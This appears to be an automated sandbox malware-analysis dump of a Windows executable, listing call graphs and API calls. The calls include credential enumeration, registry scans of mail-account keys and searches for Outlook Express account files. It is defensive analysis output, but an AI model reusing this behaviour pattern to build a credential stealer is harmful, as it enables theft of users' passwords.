33353->33260 33354->33267 33363 406fc7 memset _mbscpy 33355->33363 33357 40709f CreateFontIndirectA 33357->33300 33359 4019e1 33358->33359 33360 4019c2 strncat 33359->33360 33361 4019e5 memset LoadIconA 33359->33361 33360->33359 33361->33303 33362->33295 33363->33357 33364->33307 33366 407a65 33365->33366 33367 407a5b free 33365->33367 33366->33319 33367->33366 33368->33307 33370 406f37 malloc 33369->33370 33371 406f7d 33369->33371 33373 406f73 33370->33373 33374 406f58 33370->33374 33371->33307 33373->33307 33375 406f6c free 33374->33375 33376 406f5c memcpy 33374->33376 33375->33373 33376->33375 33378 407a38 33377->33378 33379 407a2d free 33377->33379 33381 406f30 3 API calls 33378->33381 33380 407a43 33379->33380 33382 40796e 7 API calls 33380->33382 33381->33380 33382->33318 33399 406f96 GetModuleFileNameA 33383->33399 33385 409805 strrchr 33386 409814 33385->33386 33387 409817 _mbscat 33385->33387 33386->33387 33387->33325 33400 44b090 33388->33400 33393 40930c 3 API calls 33394 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33393->33394 33395 4097c5 LoadStringA 33394->33395 33396 4097db 33395->33396 33396->33395 33398 4097f3 33396->33398 33407 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33396->33407 33398->33245 33399->33385 33401 40973e _mbscpy _mbscpy 33400->33401 33402 40930c 33401->33402 33403 44b090 33402->33403 33404 409319 memset GetPrivateProfileStringA 33403->33404 33405 409374 33404->33405 33406 409364 WritePrivateProfileStringA 33404->33406 33405->33393 33406->33405 33407->33396 33418 406f81 GetFileAttributesA 33408->33418 33410 409675 33411 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33410->33411 33417 4096ee 33410->33417 33419 409278 GetPrivateProfileStringA 33411->33419 33413 4096c9 33420 409278 GetPrivateProfileStringA 33413->33420 33415 4096da 33421 409278 GetPrivateProfileStringA 33415->33421 33417->33246 33418->33410 33419->33413 33420->33415 33421->33417 33513 409c1c 33422->33513 33425 401e69 memset 33552 410dbb 33425->33552 33428 401ec2 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33582 33429 401ed4 33567 406f81 GetFileAttributesA 33429->33567 33432 401ee6 strlen strlen 33434 401f15 33432->33434 33435 401f28 33432->33435 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33434->33583 33568 406f81 GetFileAttributesA 33435->33568 33438 401f35 33569 401c31 33438->33569 33441 401f75 33581 410a9c RegOpenKeyExA 33441->33581 33442 401c31 7 API calls 33442->33441 33444 401f91 33445 402187 33444->33445 33446 401f9c memset 33444->33446 33448 402195 ExpandEnvironmentStringsA 33445->33448 33449 4021a8 _strcmpi 33445->33449 33584 410b62 RegEnumKeyExA 33446->33584 33593 406f81 GetFileAttributesA 33448->33593 33449->33338 33449->33339 33451 40217e RegCloseKey 33451->33445 33452 401fd9 atoi 33453 401fef memset memset sprintf 33452->33453 33461 401fc9 33452->33461 33585 410b1e 33453->33585 33456 402165 33456->33451 33457 402076 memset memset strlen strlen 33457->33461 33458 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33461 33459 4020dd strlen strlen 33459->33461 33460 406f81 GetFileAttributesA 33460->33461 33461->33451 33461->33452 33461->33456 33461->33457 33461->33458 33461->33459 33461->33460 33462 402167 _mbscpy 33461->33462 33592 410b62 RegEnumKeyExA 33461->33592 33462->33451 33464 40c422 33463->33464 33465 40c425 _mbscat _mbscpy _mbscpy 33463->33465 33464->33465 33466 40c49d 33465->33466 33467 40c512 33466->33467 33468 40c502 GetWindowPlacement 33466->33468 33469 40c538 33467->33469 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33467->33614 33468->33467 33607 409b31 33469->33607 33473 40ba28 33474 40ba87 33473->33474 33480 40ba3c 33473->33480 33617 406c62 LoadCursorA SetCursor 33474->33617 33476 40ba8c 33618 410a9c RegOpenKeyExA 33476->33618 33619 404734 33476->33619 33627 4107f1 33476->33627 33630 404785 33476->33630 33633 403c16 33476->33633 33477 40ba43 _mbsicmp 33477->33480 33478 40baa0 33479 407e30 _strcmpi 33478->33479 33483 40bab0 33479->33483 33480->33474 33480->33477 33709 40b5e5 10 API calls 33480->33709 33481 40bafa SetCursor 33481->33346 33483->33481 33484 40baf1 qsort 33483->33484 33484->33481 34070 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33490->34070 33492 40b00e 33493 40b016 33492->33493 33494 40b01f GetStdHandle 33492->33494 34071 406d1a CreateFileA 33493->34071 33496 40b01c 33494->33496 33497 40b035 33496->33497 33498 40b12d 33496->33498 34072 406c62 LoadCursorA SetCursor 33497->34072 34076 406d77 9 API calls 33498->34076 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34074 40a699 12 API calls 33502->34074 33503 40b042 33503->33502 33503->33509 34073 40a57c strlen WriteFile 33503->34073 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34075 406d77 9 API calls 33509->34075 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33559 401e9e strlen strlen 33559->33428 33559->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33559 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33559 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33906 402bd1 40 API calls 33659->33906 33771 410a9c RegOpenKeyExA 33660->33771 33663 403d0a 33664 403d1c 33663->33664 33907 402bd1 40 API calls 33663->33907 33772 402c5d 33664->33772 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33790 410a9c RegOpenKeyExA 33669->33790 33671 403d51 33672 403d61 33671->33672 33908 402b22 47 API calls 33671->33908 33791 410a9c RegOpenKeyExA 33672->33791 33675 403d87 33676 403d97 33675->33676 33909 402b22 47 API calls 33675->33909 33792 410a9c RegOpenKeyExA 33676->33792 33679 403dbd 33680 403dcd 33679->33680 33910 402b22 47 API calls 33679->33910 33793 410808 33680->33793 33684 404785 FreeLibrary 33685 403de8 33684->33685 33797 402fdb 33685->33797 33688 402fdb 34 API calls 33689 403e00 33688->33689 33813 4032b7 33689->33813 33698 403e3b 33699 403e73 33698->33699 33700 403e46 _mbscpy 33698->33700 33860 40fb00 33699->33860 33912 40f334 334 API calls 33700->33912 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33913 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33913 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33914 4021b6 memset 33716->33914 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33915 4023e5 16 API calls 33719->33915 33720->33719 33723 4085e2 33722->33723 33916 4082cd 11 API calls 33723->33916 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33919 410b62 RegEnumKeyExA 33729->33919 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33920 410a9c RegOpenKeyExA 33731->33920 33923 410b62 RegEnumKeyExA 33731->33923 33732->33728 33921 410add RegQueryValueExA 33734->33921 33737 408694 33922 40848b 10 API calls 33737->33922 33739 4086ab RegCloseKey 33739->33731 33924 410a9c RegOpenKeyExA 33740->33924 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33925 410b62 RegEnumKeyExA 33744->33925 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33926 410a9c RegOpenKeyExA 33748->33926 33927 4080ed 11 API calls 33748->33927 33928 410b62 RegEnumKeyExA 33748->33928 33751 4082a2 RegCloseKey 33751->33748 33929 4045db 33752->33929 33755 4088f7 33937 404656 33755->33937 33757 40872d 33757->33755 33759 408737 wcslen 33757->33759 33761 4088ef LocalFree 33759->33761 33767 40876a 33759->33767 33760 40872b CredEnumerateW 33760->33757 33761->33755 33762 40877a wcsncmp 33762->33767 33764 404734 3 API calls 33764->33767 33765 404785 FreeLibrary 33765->33767 33766 408812 memset 33766->33767 33768 40883c memcpy wcschr 33766->33768 33767->33761 33767->33762 33767->33764 33767->33765 33767->33766 33767->33768 33769 4088c3 LocalFree 33767->33769 33940 40466b _mbscpy 33767->33940 33768->33767 33769->33767 33770 410a9c RegOpenKeyExA 33770->33659 33771->33663 33941 410a9c RegOpenKeyExA 33772->33941 33774 402c7a 33775 402da5 33774->33775 33776 402c87 memset 33774->33776 33775->33668 33942 410b62 RegEnumKeyExA 33776->33942 33778 402d9c RegCloseKey 33778->33775 33779 410b1e 3 API calls 33780 402ce4 memset sprintf 33779->33780 33943 410a9c RegOpenKeyExA 33780->33943 33782 402d28 33783 402d3a sprintf 33782->33783 33944 402bd1 40 API calls 33782->33944 33945 410a9c RegOpenKeyExA 33783->33945 33786 402cb2 33786->33778 33786->33779 33789 402d9a 33786->33789 33946 402bd1 40 API calls 33786->33946 33947 410b62 RegEnumKeyExA 33786->33947 33789->33778 33790->33671 33791->33675 33792->33679 33794 410816 33793->33794 33795 4107f1 FreeLibrary 33794->33795 33796 403ddd 33795->33796 33796->33684 33948 410a9c RegOpenKeyExA 33797->33948 33799 402ff9 33800 403006 memset 33799->33800 33801 40312c 33799->33801 33949 410b62 RegEnumKeyExA 33800->33949 33801->33688 33803 403122 RegCloseKey 33803->33801 33804 410b1e 3 API calls 33805 403058 memset sprintf 33804->33805 33950 410a9c RegOpenKeyExA 33805->33950 33807 403033 33807->33803 33807->33804 33808 4030a2 memset 33807->33808 33809 410b62 RegEnumKeyExA 33807->33809 33811 4030f9 RegCloseKey 33807->33811 33952 402db3 26 API calls 33807->33952 33951 410b62 RegEnumKeyExA 33808->33951 33809->33807 33811->33807 33814 4032d5 33813->33814 33815 4033a9 33813->33815 33953 4021b6 memset 33814->33953 33828 4034e4 memset memset 33815->33828 33817 4032e1 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33817->33954 33819 4032ea 33820 4032f8 memset GetPrivateProfileSectionA 33819->33820 33955 4023e5 16 API calls 33819->33955 33820->33815 33825 40332f 33820->33825 33822 40339b strlen 33822->33815 33822->33825 33824 403350 strchr 33824->33825 33825->33815 33825->33822 33956 4021b6 memset 33825->33956 33957 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33825->33957 33958 4023e5 16 API calls 33825->33958 33829 410b1e 3 API calls 33828->33829 33830 40353f 33829->33830 33831 40357f 33830->33831 33832 403546 _mbscpy 33830->33832 33836 403985 33831->33836 33959 406d55 strlen _mbscat 33832->33959 33834 403565 _mbscat 33960 4033f0 19 API calls 33834->33960 33961 40466b _mbscpy 33836->33961 33840 4039aa 33842 4039ff 33840->33842 33962 40f460 memset memset 33840->33962 33983 40f6e2 33840->33983 33999 4038e8 21 API calls 33840->33999 33843 404785 FreeLibrary 33842->33843 33844 403a0b 33843->33844 33845 4037ca memset memset 33844->33845 34007 444551 memset 33845->34007 33848 4038e2 33848->33698 33911 40f334 334 API calls 33848->33911 33850 40382e 33851 406f06 2 API calls 33850->33851 33852 403843 33851->33852 33853 406f06 2 API calls 33852->33853 33854 403855 strchr 33853->33854 33855 403884 _mbscpy 33854->33855 33856 403897 strlen 33854->33856 33857 4038bf _mbscpy 33855->33857 33856->33857 33858 4038a4 sprintf 33856->33858 34019 4023e5 16 API calls 33857->34019 33858->33857 33861 44b090 33860->33861 33862 40fb10 RegOpenKeyExA 33861->33862 33863 403e7f 33862->33863 33864 40fb3b RegOpenKeyExA 33862->33864 33874 40f96c 33863->33874 33865 40fb55 RegQueryValueExA 33864->33865 33866 40fc2d RegCloseKey 33864->33866 33867 40fc23 RegCloseKey 33865->33867 33868 40fb84 33865->33868 33866->33863 33867->33866 33869 404734 3 API calls 33868->33869 33870 40fb91 33869->33870 33870->33867 33871 40fc19 LocalFree 33870->33871 33872 40fbdd memcpy memcpy 33870->33872 33871->33867 34024 40f802 11 API calls 33872->34024 33875 4070ae GetVersionExA 33874->33875 33876 40f98d 33875->33876 33877 4045db 7 API calls 33876->33877 33881 40f9a9 33877->33881 33878 40fae6 33879 404656 FreeLibrary 33878->33879 33880 403e85 33879->33880 33886 4442ea memset 33880->33886 33881->33878 33882 40fa13 memset WideCharToMultiByte 33881->33882 33882->33881 33883 40fa43 _strnicmp 33882->33883 33883->33881 33884 40fa5b WideCharToMultiByte 33883->33884 33884->33881 33885 40fa88 WideCharToMultiByte 33884->33885 33885->33881 33887 410dbb 9 API calls 33886->33887 33888 444329 33887->33888 34025 40759e strlen strlen 33888->34025 33893 410dbb 9 API calls 33894 444350 33893->33894 33895 40759e 3 API calls 33894->33895 33896 44435a 33895->33896 33897 444212 65 API calls 33896->33897 33898 444366 memset memset 33897->33898 33899 410b1e 3 API calls 33898->33899 33900 4443b9 ExpandEnvironmentStringsA strlen 33899->33900 33901 4443f4 _strcmpi 33900->33901 33902 4443e5 33900->33902 33903 403e91 33901->33903 33904 44440c 33901->33904 33902->33901 33903->33478 33905 444212 65 API calls 33904->33905 33905->33903 33906->33660 33907->33664 33908->33672 33909->33676 33910->33680 33911->33698 33912->33699 33913->33713 33914->33718 33915->33714 33917 40841c 33916->33917 33918 410a9c RegOpenKeyExA 33917->33918 33918->33727 33919->33731 33920->33731 33921->33737 33922->33739 33923->33731 33924->33742 33925->33748 33926->33748 33927->33751 33928->33748 33930 404656 FreeLibrary 33929->33930 33931 4045e3 LoadLibraryA 33930->33931 33932 404651 33931->33932 33933 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33931->33933 33932->33755 33932->33757 33932->33760 33934 40463d 33933->33934 33935 404643 33934->33935 33936 404656 FreeLibrary 33934->33936 33935->33932 33936->33932 33938 403cd2 33937->33938 33939 40465c FreeLibrary 33937->33939 33938->33770 33939->33938 33940->33767 33941->33774 33942->33786 33943->33782 33944->33783 33945->33786 33946->33786 33947->33786 33948->33799 33949->33807 33950->33807 33951->33807 33952->33807 33953->33817 33954->33819 33955->33820 33956->33824 33957->33825 33958->33825 33959->33834 33960->33831 33961->33840 34000 4078ba 33962->34000 33965 4078ba _mbsnbcat 33966 40f5a3 RegOpenKeyExA 33965->33966 33967 40f5c3 RegQueryValueExA 33966->33967 33968 40f6d9 33966->33968 33969 40f6d0 RegCloseKey 33967->33969 33970 40f5f0 33967->33970 33968->33840 33969->33968 33970->33969 33971 40f675 33970->33971 34004 40466b _mbscpy 33970->34004 33971->33969 34005 4012ee strlen 33971->34005 33973 40f611 33975 404734 3 API calls 33973->33975 33980 40f616 33975->33980 33976 40f69e RegQueryValueExA 33976->33969 33977 40f6c1 33976->33977 33977->33969 33978 40f66a 33979 404785 FreeLibrary 33978->33979 33979->33971 33980->33978 33981 40f661 LocalFree 33980->33981 33982 40f645 memcpy 33980->33982 33981->33978 33982->33981 34006 40466b _mbscpy 33983->34006 33985 40f6fa 33986 4045db 7 API calls 33985->33986 33987 40f708 33986->33987 33988 40f7e2 33987->33988 33989 404734 3 API calls 33987->33989 33990 404656 FreeLibrary 33988->33990 33994 40f715 33989->33994 33991 40f7f1 33990->33991 33992 404785 FreeLibrary 33991->33992 33993 40f7fc 33992->33993 33993->33840 33994->33988 33995 40f797 WideCharToMultiByte 33994->33995 33996 40f7b8 strlen 33995->33996 33997 40f7d9 LocalFree 33995->33997 33996->33997 33998 40f7c8 _mbscpy 33996->33998 33997->33988 33998->33997 33999->33840 34001 4078e6 34000->34001 34002 4078c7 _mbsnbcat 34001->34002 34003 4078ea 34001->34003 34002->34001 34003->33965 34004->33973 34005->33976 34006->33985 34020 410a9c RegOpenKeyExA 34007->34020 34009 44458b 34010 40381a 34009->34010 34021 410add RegQueryValueExA 34009->34021 34010->33848 34018 4021b6 memset 34010->34018 34012 4445dc RegCloseKey 34012->34010 34013 4445a4 34013->34012 34022 410add RegQueryValueExA 34013->34022 34015 4445c1 34015->34012 34023 444879 30 API calls 34015->34023 34017 4445da 34017->34012 34018->33850 34019->33848 34020->34009 34021->34013 34022->34015 34023->34017 34024->33871 34026 4075c9 34025->34026 34027 4075bb _mbscat 34025->34027 34028 444212 34026->34028 34027->34026 34045 407e9d 34028->34045 34031 44424d 34032 444274 34031->34032 34033 444258 34031->34033 34053 407ef8 34031->34053 34034 407e9d 9 API calls 34032->34034 34066 444196 52 API calls 34033->34066 34041 4442a0 34034->34041 34036 407ef8 9 API calls 34036->34041 34037 4442ce 34063 407f90 34037->34063 34041->34036 34041->34037 34043 444212 65 API calls 34041->34043 34067 407e62 strcmp strcmp 34041->34067 34042 407f90 FindClose 34044 4442e4 34042->34044 34043->34041 34044->33893 34046 407f90 FindClose 34045->34046 34047 407eaa 34046->34047 34048 406f06 2 API calls 34047->34048 34049 407ebd strlen strlen 34048->34049 34050 407ee1 34049->34050 34051 407eea 34049->34051 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34068 34051->34031 34054 407f03 FindFirstFileA 34053->34054 34055 407f24 FindNextFileA 34053->34055 34056 407f3f 34054->34056 34057 407f46 strlen strlen 34055->34057 34058 407f3a 34055->34058 34056->34057 34060 407f7f 34056->34060 34057->34060 34061 407f76 34057->34061 34059 407f90 FindClose 34058->34059 34059->34056 34060->34031 34069 4070e3 strlen _mbscat _mbscpy _mbscat 34061->34069 34064 407fa3 34063->34064 34065 407f99 FindClose 34063->34065 34064->34042 34065->34064 34066->34031 34067->34041 34068->34051 34069->34060 34070->33492 34071->33496 34072->33503 34073->33502 34074->33509 34075->33506 34076->33501 34421 43ffc8 18 API calls 34235 4281cc 15 API calls 34423 4383cc 110 API calls 34236 4275d3 41 API calls 34424 4153d3 22 API calls 34237 444dd7 _XcptFilter 34429 4013de 15 API calls 34431 425115 111 API calls 34432 43f7db 18 API calls 34435 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34239 4335ee 16 API calls 34437 429fef 11 API calls 34240 444deb _exit _c_exit 34438 40bbf0 138 API calls 34243 425115 79 API calls 34442 437ffa 22 API calls 34247 4021ff 14 API calls 34248 43f5fc 149 API calls 34443 40e381 9 API calls 34250 405983 40 API calls 34251 42b186 27 API calls 34252 427d86 76 API calls 34253 403585 20 API calls 34255 42e58e 18 API calls 34258 425115 75 API calls 34260 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34447 434395 16 API calls 34262 441d9c memcmp 34449 43f79b 119 API calls 34263 40c599 43 API calls 34450 426741 87 API calls 34267 4401a6 21 API calls 34269 426da6 memcpy memset memset memcpy 34270 4335a5 15 API calls 34272 4299ab memset memset memcpy memset memset 34273 40b1ab 8 API calls 34455 425115 76 API calls 34459 4113b2 18 API calls 34463 40a3b8 memset sprintf SendMessageA 34077 410bbc 34080 4109cf 34077->34080 34081 4109dc 34080->34081 34082 410a23 memset GetPrivateProfileStringA 34081->34082 34083 4109ea memset 34081->34083 34088 407646 strlen 34082->34088 34093 4075cd sprintf memcpy 34083->34093 34086 410a0c WritePrivateProfileStringA 34087 410a65 34086->34087 34089 40765a 34088->34089 34090 40765c 34088->34090 34089->34087 34092 4076a3 34090->34092 34094 40737c strtoul 34090->34094 34092->34087 34093->34086 34094->34090 34275 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                                    • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                                                                    • API String ID: 379999529-620537770
                                                                                                                                                                                                                                    • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                                    • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402018
